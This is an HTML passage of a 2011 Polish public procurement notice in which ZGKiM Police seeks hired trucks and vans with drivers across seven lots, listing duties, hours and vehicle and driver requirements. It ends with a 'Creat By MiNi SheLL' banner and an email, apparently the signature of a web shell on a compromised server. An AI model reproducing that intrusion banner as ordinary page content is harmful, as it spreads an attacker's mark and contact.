2.	Formularz oferty - zgodnie z otrzymanym wzorem - zał. nr 4 (a-g)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach (art. 145 pzp).
2.	W przypadku, o którym mowa w ust. 1, Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
3.	Wszelkie zmiany umowy mogą nastąpić w formie pisemnego aneksu podpisanego przez obydwie strony - pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zgkim.police.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia w wersji elektronicznej można uzyskać na stronie internetowej, w wersji drukowanej można otrzymać  w siedzibie Zamawiającego pok. 310.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2011 godzina 09:30, miejsce: -	Zamkniętą kopertę zawierającą ofertę należy złożyć w sekretariacie ZGKiM Police, ul. Bankowa 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nr  1.    samochód ciężarowy o ład. do 2 ton (np. multikar).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nr  1.    samochód ciężarowy o ład. do 2 ton (np. multikar)


a)   Zatrudnienie przy eksploatacji budynków w dziale TOB:

-	wywóz gruzu po remoncie lokali,
-	przewożenie dużych elementów (drzwi, okna, ramki ogrodzeniowe, słupki, obudowy śmietników, urządzenia zabawowe, itp.),
-	rozwożenie narzędzi, piasku na okres zimowy, wywóz liści na wysypisko,
-	oczyszczanie piaskownic, wywożenie starego piasku i napełnianie piaskownic nowym piaskiem,
-	opróżnianie mieszkań po osobach zmarłych nie posiadających rodzin,
-	odśnieżanie i wywożenie śniegu (w szczególnych przypadkach, na jednorazowe zlecenie),
-	załadunek i rozładunek własny (kierowcy).

-	Planowane zatrudnienie - około  180 godzin miesięcznie

a)	Dodatkowe zatrudnienie w dziale OUK 
-	do wywozu nieczystości z cmentarzy, gdzie nie ma możliwości wjazdu inny środek transportu (ze względu na szerokość alejek),
-	załadunek i rozładunek własny (kierowcy).

-	Planowane dodatkowe zatrudnienie - około  30 godzin miesięcznie.

Płatność wg stawki za godzinę pracy.

Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	Wymagana możliwość wjazdu w wąskie przejścia blisko budynków, nie powodując zniszczeń zieleni i chodników swoim ciężarem (szer. do 2,0 m),
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min. 1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy.
-	Kierowca nie może mieć przeciwwskazań lekarskich do czynności załadunkowych        (tj. ręcznego przenoszenia ciężarów o wadze jednostkowej do 50 kg) - oświadczenie                      o braku przeciwwskazań wymagane będzie przed podpisaniem umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nr  2.	samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków od 600 do 1000 kg  i osób w liczbie 6 osób łącznie z kierowcą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nr  2.	samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków od 600 do 1000 kg  i osób w liczbie 6 osób łącznie z kierowcą


a)  Zatrudnienie w dziale TOB (dla instalatorów): 

-	do przewozu pracowników przy robotach remontowych budynków, 
-	przewozu narzędzi, sprzętu i materiałów w opakowaniach,
-	pomoc w załadunku i rozładunku przewożonych towarów.


-	Planowane zatrudnienie: 
7,5 godziny dziennie w dni robocze.

Płatność wg stawki za godzinę pracy.
Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	Możliwość przewozu w części osobowej pięciu pracowników,
-	Część towarowa oddzielona od części osobowej trwałą przegrodą,
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min. 1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy.
-	Kierowca nie może mieć przeciwwskazań lekarskich do czynności załadunkowych        (tj. ręcznego przenoszenia ciężarów o wadze jednostkowej do 50 kg) - oświadczenie                      o braku przeciwwskazań wymagane będzie przed podpisaniem umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Nr  3.  samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków ca 1500 kg i osób w liczbie 6 osób łącznie           z kierowcą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nr  3.  samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków ca 1500 kg i osób w liczbie 6 osób łącznie           z kierowcą


a)  Zatrudnienie w dziale TOB (dla budowlańców): 

-	do przewozu pracowników przy robotach remontowych budynków, 
-	przewozu narzędzi, sprzętu i materiałów w opakowaniach,
-	pomoc w załadunku i rozładunku przewożonych towarów.

b)  dodatkowe zatrudnienie w dziale Techn. i GM (zaopatrzenie materiałowe)
-	do przewozu zakupionych materiałów dla potrzeb poszczególnych działów ZGKiM (średnio 1 wyjazd w tygodniu do 5 godzin, miesięcznie ok. 20 godzin).
-	załadunek i rozładunek materiałów zakupionych o wadze jednostkowej do 50 kg nie wymagających pomocy innych osób - przez kierowcę.


-	Łączne planowane zatrudnienie - 8 godzin dziennie w dni robocze,

Płatność wg stawki za godzinę pracy.

Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	Możliwość przewozu w części osobowej pięciu pracowników,
-	Część towarowa oddzielona od części osobowej trwałą przegrodą,
-	Skrzynia kryta plandeką,
-	Długość skrzyni min. 3,0 m,
-	Podłoga skrzyni powinna być płaska (bez nadkoli),
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min. 1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy.
-	Kierowca nie może mieć przeciwwskazań lekarskich do czynności załadunkowych        (tj. ręcznego przenoszenia ciężarów o wadze jednostkowej do 50 kg) - oświadczenie                      o braku przeciwwskazań wymagane będzie przed podpisaniem umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Nr  4.  samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków ca 1500 -2500 kg  i osób w liczbie 5 osób łącznie z kierowcą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nr  4.  samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków ca 1500 -2500 kg  i osób w liczbie 5 osób łącznie z kierowcą


a)  Zatrudnienie w dziale TOB (dla dekarzy): 

-	do przewozu pracowników przy robotach dekarskich, 
-	przewóz drabiny, narzędzi, sprzętu, materiałów.


-	Planowane zatrudnienie - około 80 godzin na miesiąc.


Płatność wg stawki za godzinę pracy.
Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	Możliwość przewozu w części osobowej czterech pracowników,
-	Część towarowa samochodu oddzielona od części osobowej trwałą przegrodą,
-	Skrzynia ładunkowa powinna mieć długość 3,50 - 4,50 m,
-	Załadunek i rozładunek przy otwarciu burt na boki i do tyłu,
-	Wysokość podłogi skrzyni załadunkowej od ziemi maksymalnie 0,80 m,
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min. 1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Nr  5.	samochód osobowo-towarowy typu kombi lub mini Van przeznaczony do przewozu 5 osób  łącznie z kierowcą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nr  5.	samochód osobowo-towarowy typu kombi lub mini Van przeznaczony do przewozu 5 osób  łącznie z kierowcą


a)   Zatrudnienie w działach administracyjnych obejmujące: 

-	przewóz dokumentów do urzędów,
-	przewóz gotówki dla potrzeb obsługi kasowej,
-	obsługę administracyjną - zakupy druków, znaczków, biletów, itp.,
-	przewóz środków czystości, materiałów biurowych,
-	codzienny przewóz poczty i prasy,
-	wyjazdy kontrolne w teren na zlecenie działów administracji,
-	pomoc przy załadunku i wyładunku przewiezionych towarów.

-	Planowane zatrudnienie: 
5-6 godzin dziennie w dni robocze - w ciągu miesiąca ok. 144 godziny.

Płatność wg stawki za godzinę pracy.
Wymagania Zamawiającego:

-    Od kierowcy wymagana niekaralność, wiarygodność,
-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	Możliwość przewozu  minimum 4 pracowników,
-	Estetyczny wygląd samochodu,
-	Wydzielona część bagażnika auta fabryczną kratą,
-	Całkowita ładowność auta 500 kg, 
-	Pojemność bagażnika minimum 500 litrów bez składania tylnych siedzeń.
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnej specyfice potwierdzone min.1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Nr  6.	samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków od 600 do 1000 kg  i osób w liczbie 5 osób łącznie z kierowcą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nr  6.	samochód ciężarowo-osobowy przeznaczony konstrukcyjnie             do przewozu ładunków od 600 do 1000 kg  i osób w liczbie 5 osób łącznie z kierowcą



a)	Zatrudnienie w dziale OUK 

-	do przewozu pracowników do obsługi pogrzebów i prac konserwacyjnych,
-	do przewozu materiałów i narzędzi, 
-	do przewozu pracowników do kontroli szaletów, kontroli oświetlenia ulicznego.


-	Planowane zatrudnienie - około 80 godzin na miesiąc.

Płatność wg stawki za godzinę pracy.


Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy),
-	w części osobowej przewóz pracowników - minimum 4 osoby,
-	część towarowa oddzielona od części osobowej trwałą przegrodą,
-	część towarowa może być zakryta na boki, z załadunkiem narzędzi i materiałów tylnymi drzwiami.
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych min. 5 lat od uzyskania prawa jazdy.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min.1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Nr  7.	samochód ciężarowy z HDS - samowyładowczy lub wywrotka , przeznaczony konstrukcyjnie  do przewozu ładunków ca 5000 kg                                  i osób w liczbie 2 osób łącznie z kierowcą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nr  7.	samochód ciężarowy z HDS - samowyładowczy lub wywrotka , przeznaczony konstrukcyjnie  do przewozu ładunków ca 5000 kg                                  i osób w liczbie 2 osób łącznie z kierowcą


a)	Zatrudnienie w dziale OUK:


-	wywóz śmieci z cmentarzy, 
-	przewóz materiałów sypkich,
-	przewóz ładowanych mechanicznie materiałów w sztukach i na paletach o ciężarze do 900 kg,
-	samodzielny załadunek śmieci i materiałów sypkich za pomocą HDS,
-	załadunek za pomocą HDS pojemników do selektywnej zbiórki odpadów.



-	Planowane zatrudnienie - około 80 godzin na miesiąc.

Płatność wg stawki za godzinę pracy.


Wymagania Zamawiającego:

-	Wymagana stała łączność z kierowcą (telefon komórkowy).
-	HDS o ładowności do 900 kg,
-	HDS z możliwością samodzielnego załadunku materiałów sypkich i śmieci,
-	HDS z zaczepami do załadunku pojemników,
-	burty samochodu otwierane na boki i tył,
-	wyładunek mechaniczny może być tylko od tyłu.
-	Wymagane doświadczenie kierowcy w prowadzeniu pojazdów mechanicznych kat. C min. 5 lat.
-	Wymagane doświadczenie kierowcy w świadczeniu usług o podobnym zakresie potwierdzone min. 1 referencją.
-	Pojazd musi spełniać warunki techniczne określone w art. 66 ust. 1 ustawy Prawo                       o ruchu drogowym z dnia 20.06.1997 (Dz.U.03.58.515 z późniejszymi zmianami) oraz musi mieć ważne badanie techniczne, zgodnie z art. 81i 82 w/w ustawy.
-	Kierowca musi posiadać uprawnienia do kierowania pojazdem o określonej kategorii, zgodnie z art. 87 ust.1 pkt.1 i art. 88 w/w ustawy.
-	Kierowca nie może mieć przeciwwskazań lekarskich do czynności załadunkowych        (tj. ręcznego przenoszenia ciężarów o wadze jednostkowej do 50 kg) - oświadczenie                      o braku przeciwwskazań wymagane będzie przed podpisaniem umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com